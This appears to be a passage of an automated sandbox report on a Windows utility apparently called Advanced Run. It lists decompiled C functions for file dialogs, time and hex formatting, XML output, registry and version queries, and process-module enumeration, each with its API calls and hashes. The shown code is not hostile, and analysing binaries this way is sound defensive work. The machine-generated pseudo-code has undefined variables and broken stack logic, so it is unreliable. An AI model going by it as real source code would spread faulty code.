                                                                                                                                                                                                                          				_v60 = E00405B81(_t54);
                                                                                                                                                                                                                          				_v104 =  *((intOrPtr*)(__edi + 0x10));
                                                                                                                                                                                                                          				_v48 =  &_v12;
                                                                                                                                                                                                                          				_v96 =  &_v2684;
                                                                                                                                                                                                                          				_v108 = 0x4c;
                                                                                                                                                                                                                          				_v92 = 0;
                                                                                                                                                                                                                          				_v84 = 1;
                                                                                                                                                                                                                          				_v80 =  &_v636;
                                                                                                                                                                                                                          				_v76 = 0x104;
                                                                                                                                                                                                                          				_v72 = 0;
                                                                                                                                                                                                                          				_v64 = 0;
                                                                                                                                                                                                                          				_v56 = 0x80806;
                                                                                                                                                                                                                          				_t46 = GetSaveFileNameW( &_v108);
                                                                                                                                                                                                                          				if(_t46 != 0) {
                                                                                                                                                                                                                          					wcscpy( &_v636, _v80);
                                                                                                                                                                                                                          					return E0040365E(__edi, 1,  &_v636);
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return _t46;
                                                                                                                                                                                                                          			}































                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004036F6
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403712
                                                                                                                                                                                                                            • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                                                                                                                                            • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                                                                                                                                                            • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                                                                                                                                                                            • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                                                                                                                                                                            • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                                                                                                                                                                            • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                                                                                                                                            • Part of subcall function 00405236: memset.MSVCRT ref: 00405257
                                                                                                                                                                                                                            • Part of subcall function 00405236: _snwprintf.MSVCRT ref: 00405285
                                                                                                                                                                                                                            • Part of subcall function 00405236: wcslen.MSVCRT ref: 00405291
                                                                                                                                                                                                                            • Part of subcall function 00405236: memcpy.MSVCRT ref: 004052A9
                                                                                                                                                                                                                            • Part of subcall function 00405236: wcslen.MSVCRT ref: 004052B7
                                                                                                                                                                                                                            • Part of subcall function 00405236: memcpy.MSVCRT ref: 004052CA
                                                                                                                                                                                                                          • GetSaveFileNameW.COMDLG32(?), ref: 004037AF
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 004037C3
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcpymemsetwcslen$HandleModulewcscpy$FileLoadNameSaveString_snwprintf
                                                                                                                                                                                                                          • String ID: L$cfg
                                                                                                                                                                                                                          • API String ID: 275899518-3734058911
                                                                                                                                                                                                                          • Opcode ID: 82f9c32c0c79633b068e26f34505a517ae9d13a5a1787d7b2c1c5d310a57e8a8
                                                                                                                                                                                                                          • Instruction ID: 069f946bae6f7cb0c9846f37a0b0d91fba0b14879ba0d1f27e167351657a8a18
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 82f9c32c0c79633b068e26f34505a517ae9d13a5a1787d7b2c1c5d310a57e8a8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 78312AB1D04218AFDB50DFA5D889ADEBBB8FF04314F10416AE508B6280DB746A85CF99
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E00404ED0(FILETIME* __eax, wchar_t* _a4) {
                                                                                                                                                                                                                          				struct _SYSTEMTIME _v20;
                                                                                                                                                                                                                          				long _v276;
                                                                                                                                                                                                                          				long _v532;
                                                                                                                                                                                                                          				FILETIME* _t15;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t15 = __eax;
                                                                                                                                                                                                                          				if(__eax->dwHighDateTime != 0 ||  *__eax != 0) {
                                                                                                                                                                                                                          					if(FileTimeToSystemTime(_t15,  &_v20) == 0 || _v20 <= 0x3e8) {
                                                                                                                                                                                                                          						goto L5;
                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                          						GetDateFormatW(0x400, 1,  &_v20, 0,  &_v276, 0x80);
                                                                                                                                                                                                                          						GetTimeFormatW(0x400, 0,  &_v20, 0,  &_v532, 0x80);
                                                                                                                                                                                                                          						wcscpy(_a4,  &_v276);
                                                                                                                                                                                                                          						wcscat(_a4, " ");
                                                                                                                                                                                                                          						wcscat(_a4,  &_v532);
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					L5:
                                                                                                                                                                                                                          					wcscpy(_a4, 0x40c4e8);
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return _a4;
                                                                                                                                                                                                                          			}








                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00404EEE
                                                                                                                                                                                                                          • GetDateFormatW.KERNEL32(00000400,00000001,000003E8,00000000,?,00000080,?,?,?,?), ref: 00404F1C
                                                                                                                                                                                                                          • GetTimeFormatW.KERNEL32(00000400,00000000,000003E8,00000000,?,00000080,?,?,?,?), ref: 00404F31
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 00404F41
                                                                                                                                                                                                                          • wcscat.MSVCRT ref: 00404F4E
                                                                                                                                                                                                                          • wcscat.MSVCRT ref: 00404F5D
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 00404F71
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
• Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
• Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
• Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1331804452-0
                                                                                                                                                                                                                          • Opcode ID: bcd4d34c10f2eb1284b4297ba1ca8defa1a10ff7f0e8a8f4937edf2a6ab2f069
                                                                                                                                                                                                                          • Instruction ID: 27f756489727a3478797c508db698983d473b6c4fef27ef98cb5a9ae0a7a07e8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bcd4d34c10f2eb1284b4297ba1ca8defa1a10ff7f0e8a8f4937edf2a6ab2f069
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 951160B2840119EBDB11AB94DC85EFE776CFB44304F04457ABA05B6090D774AA858BA8
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 71%
                                                                                                                                                                                                                          			E00404FE0(wchar_t* __edi, intOrPtr _a4, signed int _a8) {
                                                                                                                                                                                                                          				void _v514;
                                                                                                                                                                                                                          				long _v516;
                                                                                                                                                                                                                          				wchar_t* _t34;
                                                                                                                                                                                                                          				signed int _t35;
                                                                                                                                                                                                                          				void* _t36;
                                                                                                                                                                                                                          				void* _t37;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t34 = __edi;
                                                                                                                                                                                                                          				_v516 = _v516 & 0x00000000;
                                                                                                                                                                                                                          				memset( &_v514, 0, 0x1fc);
                                                                                                                                                                                                                          				 *__edi =  *__edi & 0x00000000;
                                                                                                                                                                                                                          				_t37 = _t36 + 0xc;
                                                                                                                                                                                                                          				_t35 = 0;
                                                                                                                                                                                                                          				do {
                                                                                                                                                                                                                          					_push( *(_t35 + _a4) & 0x000000ff);
                                                                                                                                                                                                                          					_push(L"%2.2X");
                                                                                                                                                                                                                          					_push(0xff);
                                                                                                                                                                                                                          					_push( &_v516);
                                                                                                                                                                                                                          					L0040B1EC();
                                                                                                                                                                                                                          					_t37 = _t37 + 0x10;
                                                                                                                                                                                                                          					if(_t35 > 0) {
                                                                                                                                                                                                                          						wcscat(_t34, " ");
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					if(_a8 > 0) {
                                                                                                                                                                                                                          						asm("cdq");
                                                                                                                                                                                                                          						if(_t35 % _a8 == 0) {
                                                                                                                                                                                                                          							wcscat(_t34, L"  ");
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					wcscat(_t34,  &_v516);
                                                                                                                                                                                                                          					_t35 = _t35 + 1;
                                                                                                                                                                                                                          				} while (_t35 < 0x80);
                                                                                                                                                                                                                          				return _t34;
                                                                                                                                                                                                                          			}










                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
• Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
• Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
• Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: wcscat$_snwprintfmemset
                                                                                                                                                                                                                          • String ID: %2.2X
                                                                                                                                                                                                                          • API String ID: 2521778956-791839006
                                                                                                                                                                                                                          • Opcode ID: 34c89676a934ea4f3d268c8f85442ed9bc59df14bbff203197c18b8f91f69b12
                                                                                                                                                                                                                          • Instruction ID: 93e5f8641594d75a0278127c9762c797554eaad4f41234795e116b90c7bd1a0f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 34c89676a934ea4f3d268c8f85442ed9bc59df14bbff203197c18b8f91f69b12
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FA01B57394072566E72067569C86BBB33ACEB41714F10407BFD14B91C2EB7CDA444ADC
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 42%
                                                                                                                                                                                                                          			E00407D80(intOrPtr* __ecx, intOrPtr _a4) {
                                                                                                                                                                                                                          				void _v514;
                                                                                                                                                                                                                          				char _v516;
                                                                                                                                                                                                                          				void _v1026;
                                                                                                                                                                                                                          				char _v1028;
                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                          				intOrPtr* _t16;
                                                                                                                                                                                                                          				void* _t19;
                                                                                                                                                                                                                          				intOrPtr* _t29;
                                                                                                                                                                                                                          				char* _t31;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t29 = __ecx;
                                                                                                                                                                                                                          				_v516 = 0;
                                                                                                                                                                                                                          				memset( &_v514, 0, 0x1fc);
                                                                                                                                                                                                                          				_v1028 = 0;
                                                                                                                                                                                                                          				memset( &_v1026, 0, 0x1fc);
                                                                                                                                                                                                                          				_t16 = _t29;
                                                                                                                                                                                                                          				if( *((intOrPtr*)(_t29 + 0x24)) == 0) {
                                                                                                                                                                                                                          					_push(L"<?xml version=\"1.0\" encoding=\"ISO-8859-1\" ?>\r\n");
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					_push(L"<?xml version=\"1.0\" ?>\r\n");
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				E00407343(_t16);
                                                                                                                                                                                                                          				_t19 =  *((intOrPtr*)( *_t29 + 0x24))(_a4);
                                                                                                                                                                                                                          				_t31 =  &_v516;
                                                                                                                                                                                                                          				E00407250(_t31, _t19);
                                                                                                                                                                                                                          				_push(_t31);
                                                                                                                                                                                                                          				_push(L"<%s>\r\n");
                                                                                                                                                                                                                          				_push(0xff);
                                                                                                                                                                                                                          				_push( &_v1028);
                                                                                                                                                                                                                          				L0040B1EC();
                                                                                                                                                                                                                          				return E00407343(_t29, _a4,  &_v1028);
                                                                                                                                                                                                                          			}













                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • <?xml version="1.0" ?>, xrefs: 00407DC9
                                                                                                                                                                                                                          • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00407DD0
                                                                                                                                                                                                                          • <%s>, xrefs: 00407DF3
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$_snwprintf
                                                                                                                                                                                                                          • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                                                                                          • API String ID: 3473751417-2880344631
                                                                                                                                                                                                                          • Opcode ID: 9364f374d7518812a9165f05dfc0ba647ea39d808db9dc8e90e0893e61590c4e
                                                                                                                                                                                                                          • Instruction ID: f522b8c77a058770ba0888167d6ec5df55c59d6d485a4440fbbc7c77367e2349
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9364f374d7518812a9165f05dfc0ba647ea39d808db9dc8e90e0893e61590c4e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E0019BB1E402197AD710A695CC45FBE766CEF44344F0001FBBA08F3191D738AE4586ED
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 70%
                                                                                                                                                                                                                          			E00403B3C(intOrPtr _a4) {
                                                                                                                                                                                                                          				void _v526;
                                                                                                                                                                                                                          				char _v528;
                                                                                                                                                                                                                          				void _v2574;
                                                                                                                                                                                                                          				char _v2576;
                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                          				intOrPtr _t29;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_v2576 = 0;
                                                                                                                                                                                                                          				memset( &_v2574, 0, 0x7fe);
                                                                                                                                                                                                                          				_v528 = 0;
                                                                                                                                                                                                                          				memset( &_v526, 0, 0x208);
                                                                                                                                                                                                                          				E00404AD9( &_v528);
                                                                                                                                                                                                                          				_push( &_v528);
                                                                                                                                                                                                                          				_push(L"\"%s\" /EXEFilename \"%%1\"");
                                                                                                                                                                                                                          				_push(0x3ff);
                                                                                                                                                                                                                          				_push( &_v2576);
                                                                                                                                                                                                                          				L0040B1EC();
                                                                                                                                                                                                                          				_t37 = _a4 + 0xa68;
                                                                                                                                                                                                                          				E00404923(0x104, _a4 + 0xa68, L"exefile");
                                                                                                                                                                                                                          				E00404923(0x104, _a4 + 0xc72, L"Advanced Run");
                                                                                                                                                                                                                          				E00404923(0x3ff, _t37 + 0x414,  &_v2576);
                                                                                                                                                                                                                          				_t29 = E0040467A(_t37);
                                                                                                                                                                                                                          				 *((intOrPtr*)(_a4 + 0x167c)) = _t29;
                                                                                                                                                                                                                          				return _t29;
                                                                                                                                                                                                                          			}










                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403B5D
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403B76
                                                                                                                                                                                                                            • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00403B9F
                                                                                                                                                                                                                            • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                                                                                                                                            • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                                                                                                                                                            • Part of subcall function 0040467A: memset.MSVCRT ref: 004046AF
                                                                                                                                                                                                                            • Part of subcall function 0040467A: _snwprintf.MSVCRT ref: 004046CD
                                                                                                                                                                                                                            • Part of subcall function 0040467A: RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?,?,?,00020019), ref: 004046E6
                                                                                                                                                                                                                            • Part of subcall function 0040467A: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00020019), ref: 004046FA
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$_snwprintf$CloseFileModuleNameOpenmemcpywcslen
                                                                                                                                                                                                                          • String ID: "%s" /EXEFilename "%%1"$Advanced Run$exefile
                                                                                                                                                                                                                          • API String ID: 1832587304-479876776
                                                                                                                                                                                                                          • Opcode ID: 0a24b3981c90f53bc0afe707e01056d79404e7683c9323ccd1d0569bed7942f0
                                                                                                                                                                                                                          • Instruction ID: c5548abdd2f98fe5b378efca96f69d72dd5acd8230f4ce7b006819db5738462c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0a24b3981c90f53bc0afe707e01056d79404e7683c9323ccd1d0569bed7942f0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6B11A3B29403186AD720E761CC05ACF776CDF45314F0041B6BA08B71C2D77C5B418B9E
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E0040AFBE(void* __esi, void* _a4, wchar_t* _a8, wchar_t* _a12) {
                                                                                                                                                                                                                          				void* _v8;
                                                                                                                                                                                                                          				int _v12;
                                                                                                                                                                                                                          				short _v524;
                                                                                                                                                                                                                          				char _v1036;
                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				wcscpy( &_v524, L"\\StringFileInfo\\");
                                                                                                                                                                                                                          				wcscat( &_v524, _a8);
                                                                                                                                                                                                                          				wcscat( &_v524, "\\");
                                                                                                                                                                                                                          				wcscat( &_v524, _a12);
                                                                                                                                                                                                                          				if(VerQueryValueW(_a4,  &_v524,  &_v8,  &_v12) == 0) {
                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_t34 =  &_v1036;
                                                                                                                                                                                                                          				E00404923(0xff,  &_v1036, _v8);
                                                                                                                                                                                                                          				E004049A2(_t34, __esi);
                                                                                                                                                                                                                          				return 1;
                                                                                                                                                                                                                          			}









                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040AFD3
                                                                                                                                                                                                                          • wcscat.MSVCRT ref: 0040AFE2
                                                                                                                                                                                                                          • wcscat.MSVCRT ref: 0040AFF3
                                                                                                                                                                                                                          • wcscat.MSVCRT ref: 0040B002
                                                                                                                                                                                                                          • VerQueryValueW.VERSION(?,?,00000000,?), ref: 0040B01C
                                                                                                                                                                                                                            • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                                                                                                                                            • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                                                                                                                                                            • Part of subcall function 004049A2: lstrcpyW.KERNEL32(?,?), ref: 004049B7
                                                                                                                                                                                                                            • Part of subcall function 004049A2: lstrlenW.KERNEL32(?), ref: 004049BE
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: wcscat$QueryValuelstrcpylstrlenmemcpywcscpywcslen
                                                                                                                                                                                                                          • String ID: \StringFileInfo\
                                                                                                                                                                                                                          • API String ID: 393120378-2245444037
                                                                                                                                                                                                                          • Opcode ID: 045a8df20043a551ca88a82222e75e8b313ea16cabd954164b3126fb0df90005
                                                                                                                                                                                                                          • Instruction ID: 46c7c43bb965d9609608e4f6c2ae6b517043b349f439a100f6d085a340de75fe
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 045a8df20043a551ca88a82222e75e8b313ea16cabd954164b3126fb0df90005
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CF015EB290020DA6DB11EAA2CC45DDF776DDB44304F0005B6B654F2092EB3CDA969A98
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _snwprintfwcscpy
                                                                                                                                                                                                                          • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                                                                                                                          • API String ID: 999028693-502967061
                                                                                                                                                                                                                          • Opcode ID: b64df2e80323ba4b17253e10f943d6139d2bc5d6bf6da17a7692c82038848a44
                                                                                                                                                                                                                          • Instruction ID: fc2f6d5a95cb840c7437c23e5da9cc5f651b22c54dcbfaa02992beb3cb27aad2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b64df2e80323ba4b17253e10f943d6139d2bc5d6bf6da17a7692c82038848a44
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CDE08C31A94B00B5E96423418DC7F2B2801DE90B14FB0083BF686B05C1E6BDBA0528DF
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 38%
                                                                                                                                                                                                                          			E004092F0(void* __ecx, void* __eflags, long _a4, void _a8, intOrPtr _a12, long _a16, intOrPtr _a508, intOrPtr _a512, intOrPtr _a540, intOrPtr _a544, char _a552, char _a560, intOrPtr _a572, intOrPtr _a576, intOrPtr _a580, long _a1096, char _a1600, int _a1616, void _a1618, char _a2160) {
                                                                                                                                                                                                                          				void* _v0;
                                                                                                                                                                                                                          				intOrPtr _v4;
                                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                                          				unsigned int _v12;
                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                          				char _v20;
                                                                                                                                                                                                                          				char _v24;
                                                                                                                                                                                                                          				intOrPtr _v32;
                                                                                                                                                                                                                          				intOrPtr _v36;
                                                                                                                                                                                                                          				intOrPtr _v44;
                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                          				intOrPtr _t58;
                                                                                                                                                                                                                          				void* _t59;
                                                                                                                                                                                                                          				void* _t69;
                                                                                                                                                                                                                          				void* _t72;
                                                                                                                                                                                                                          				intOrPtr _t78;
                                                                                                                                                                                                                          				void _t89;
                                                                                                                                                                                                                          				signed int _t90;
                                                                                                                                                                                                                          				int _t98;
                                                                                                                                                                                                                          				signed int _t105;
                                                                                                                                                                                                                          				signed int _t106;
                                                                                                                                                                                                                          				void* _t109;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t106 = _t105 & 0xfffffff8;
                                                                                                                                                                                                                          				E0040B550(0x8874, __ecx);
                                                                                                                                                                                                                          				_t98 = 0;
                                                                                                                                                                                                                          				_a8 = 0;
                                                                                                                                                                                                                          				if(E00404BD3() == 0) {
                                                                                                                                                                                                                          					L12:
                                                                                                                                                                                                                          					__eflags =  *0x4101b8 - _t98; // 0x0
                                                                                                                                                                                                                          					if(__eflags != 0) {
                                                                                                                                                                                                                          						_t89 = _a4;
                                                                                                                                                                                                                          						_t58 =  *0x40f83c(8, _t89);
                                                                                                                                                                                                                          						__eflags = _t58 - 0xffffffff;
                                                                                                                                                                                                                          						_v8 = _t58;
                                                                                                                                                                                                                          						if(_t58 != 0xffffffff) {
                                                                                                                                                                                                                          							_v0 = 1;
                                                                                                                                                                                                                          							_a560 = 0x428;
                                                                                                                                                                                                                          							_t59 =  *0x40f834(_t58,  &_a560);
                                                                                                                                                                                                                          							while(1) {
                                                                                                                                                                                                                          								__eflags = _t59;
                                                                                                                                                                                                                          								if(_t59 == 0) {
                                                                                                                                                                                                                          									goto L18;
                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                          								memset( &_a8, _t98, 0x21c);
                                                                                                                                                                                                                          								_a12 = _a580;
                                                                                                                                                                                                                          								_a8 = _t89;
                                                                                                                                                                                                                          								wcscpy( &_a16,  &_a1096);
                                                                                                                                                                                                                          								_a540 = _a576;
                                                                                                                                                                                                                          								_t106 = _t106 + 0x14;
                                                                                                                                                                                                                          								_a544 = _a572;
                                                                                                                                                                                                                          								_a552 = 0x428;
                                                                                                                                                                                                                          								_t69 = E00409510(_a8,  &_a8);
                                                                                                                                                                                                                          								__eflags = _t69;
                                                                                                                                                                                                                          								if(_t69 != 0) {
                                                                                                                                                                                                                          									_t59 =  *0x40f830(_v16,  &_a552);
                                                                                                                                                                                                                          									continue;
                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                          								goto L18;
                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                          							goto L18;
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					_t109 =  *0x4101bc - _t98; // 0x0
                                                                                                                                                                                                                          					if(_t109 == 0) {
                                                                                                                                                                                                                          						goto L12;
                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                          						_t72 = OpenProcess(0x410, 0, _a4);
                                                                                                                                                                                                                          						_v0 = _t72;
                                                                                                                                                                                                                          						if(_t72 != 0) {
                                                                                                                                                                                                                          							_push( &_a4);
                                                                                                                                                                                                                          							_push(0x8000);
                                                                                                                                                                                                                          							_push( &_a2160);
                                                                                                                                                                                                                          							_push(_t72);
                                                                                                                                                                                                                          							if( *0x40f840() != 0) {
                                                                                                                                                                                                                          								_t6 =  &_v12;
                                                                                                                                                                                                                          								 *_t6 = _v12 >> 2;
                                                                                                                                                                                                                          								_v8 = 1;
                                                                                                                                                                                                                          								_t90 = 0;
                                                                                                                                                                                                                          								if( *_t6 != 0) {
                                                                                                                                                                                                                          									while(1) {
                                                                                                                                                                                                                          										_a1616 = _t98;
                                                                                                                                                                                                                          										memset( &_a1618, _t98, 0x208);
                                                                                                                                                                                                                          										memset( &_a8, _t98, 0x21c);
                                                                                                                                                                                                                          										_t78 =  *((intOrPtr*)(_t106 + 0x898 + _t90 * 4));
                                                                                                                                                                                                                          										_t106 = _t106 + 0x18;
                                                                                                                                                                                                                          										_a8 = _a4;
                                                                                                                                                                                                                          										_a12 = _t78;
                                                                                                                                                                                                                          										 *0x40f838(_v16, _t78,  &_a1616, 0x104);
                                                                                                                                                                                                                          										E0040920A( &_v0,  &_a1600);
                                                                                                                                                                                                                          										_push(0xc);
                                                                                                                                                                                                                          										_push( &_v20);
                                                                                                                                                                                                                          										_push(_v4);
                                                                                                                                                                                                                          										_push(_v32);
                                                                                                                                                                                                                          										if( *0x40f844() != 0) {
                                                                                                                                                                                                                          											_a508 = _v32;
                                                                                                                                                                                                                          											_a512 = _v36;
                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                          										if(E00409510(_a8,  &_v24) == 0) {
                                                                                                                                                                                                                          											goto L18;
                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                          										_t90 = _t90 + 1;
                                                                                                                                                                                                                          										if(_t90 < _v44) {
                                                                                                                                                                                                                          											_t98 = 0;
